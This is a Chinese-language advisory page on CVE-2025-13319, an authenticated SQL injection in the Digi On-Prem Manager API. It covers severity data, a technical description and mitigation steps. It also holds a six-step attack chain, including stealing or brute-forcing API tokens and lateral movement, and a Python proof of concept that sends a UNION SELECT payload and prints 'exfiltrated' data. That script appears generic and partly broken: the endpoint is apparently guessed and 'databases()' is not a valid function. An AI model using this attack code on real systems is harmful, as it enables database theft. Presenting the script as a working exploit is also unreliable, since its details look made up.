CVE-2025-13319 | Digi On-Prem Manager API SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13319

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Digi On-Prem Manager

漏洞概述

CVE-2025-13319是Digi On-Prem Manager中一个严重的SQL注入漏洞，CVSS评分高达8.8，属于高危级别。该漏洞存在于Digi On-Prem Manager的API功能模块中，攻击者可以利用该漏洞通过精心构造的输入在API请求中注入恶意SQL代码，从而执行未授权的数据库操作。攻击成功可能导致敏感数据泄露、数据库被篡改，甚至可能进一步导致服务器被完全控制。该漏洞需要攻击者持有有效的API令牌才能实施攻击，且API功能默认不启用，这虽然在一定程度上限制了攻击面，但对于已经启用API功能且令牌管理不当的系统来说，仍然存在极大的安全风险。漏洞于2025年11月17日被披露，建议受影响用户尽快采取修复措施。

技术细节

该SQL注入漏洞存在于Digi On-Prem Manager的REST API接口中，当API处理用户提交的参数时，未对输入进行充分的过滤和参数化处理。攻击者获取有效的API令牌后，可以构造包含SQL特殊字符和语句的请求参数，如在API查询参数中注入UNION SELECT、AND条件判断等SQL语句片段。由于后端直接使用这些未经验证的输入拼接SQL查询语句，攻击者可以绕过正常的业务逻辑访问，读取、修改或删除数据库中的任意数据。攻击者首先需要通过某种方式获取有效的API令牌（如通过社工、弱口令爆破或其他信息泄露途径），然后构造恶意的API请求，将SQL注入载荷嵌入到API参数中发送至目标服务器。服务器解析请求后将执行注入的SQL代码，返回攻击者想要的数据或执行相应的数据库操作。

攻击链分析

STEP 1

步骤1

获取有效API令牌：通过社工、弱口令爆破、配置文件泄露等途径获取Digi On-Prem Manager的API访问令牌

STEP 2

步骤2

识别启用的API端点：扫描目标系统，确认API功能已启用并识别可利用的API接口

STEP 3

步骤3

构造恶意请求：准备包含SQL注入载荷的API请求，将UNION SELECT等SQL语句嵌入到API参数中

STEP 4

步骤4

发送攻击请求：将构造好的恶意请求发送至目标服务器的API接口

STEP 5

步骤5

提取敏感数据：服务器执行注入的SQL代码后，攻击者获取数据库中的敏感信息

STEP 6

步骤6

权限提升或持久化控制：根据获取的数据类型，可能进一步实施横向移动或长期控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-13319 PoC - SQL Injection in Digi On-Prem Manager API
# Target: Digi On-Prem Manager with API enabled
# Requirement: Valid API token

TARGET_URL = "https://target-server/api/v1/"
API_TOKEN = "your-valid-api-token-here"

def exploit_sql_injection():
    headers = {
        "Authorization": f"Bearer {API_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # SQL Injection payload - extract database version
    # Modify the 'query' parameter with malicious SQL
    payload = {
        "query": "1' UNION SELECT version(),user(),databases() -- "
    }
    
    try:
        response = requests.post(
            f"{TARGET_URL}search",
            headers=headers,
            json=payload,
            verify=False,
            timeout=30
        )
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text}")
        
        if response.status_code == 200:
            # Try to extract sensitive data
            data = response.json()
            print(f"Exfiltrated Data: {json.dumps(data, indent=2)}")
            return True
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
    
    return False

if __name__ == "__main__":
    print("CVE-2025-13319 - Digi On-Prem Manager API SQL Injection")
    print("=" * 60)
    exploit_sql_injection()

影响范围

Digi On-Prem Manager 所有未修复版本

防御指南

临时缓解措施

由于该漏洞需要有效的API令牌才能被利用，首先应审查现有的API令牌，确保未被泄露或使用弱密码。对于暂无法立即升级的情况，建议暂时禁用API功能，直到官方发布安全补丁。同时应加强API令牌的管理，使用强密码策略，定期更换令牌，并监控API访问日志以检测潜在的恶意活动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13319
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13319
3 Details https://www.cvedetails.com/cve/CVE-2025-13319/
4 VulDB https://vuldb.com/cve/CVE-2025-13319
5 Link https://dom.nettec.no/security-advisories/DOM-25-001/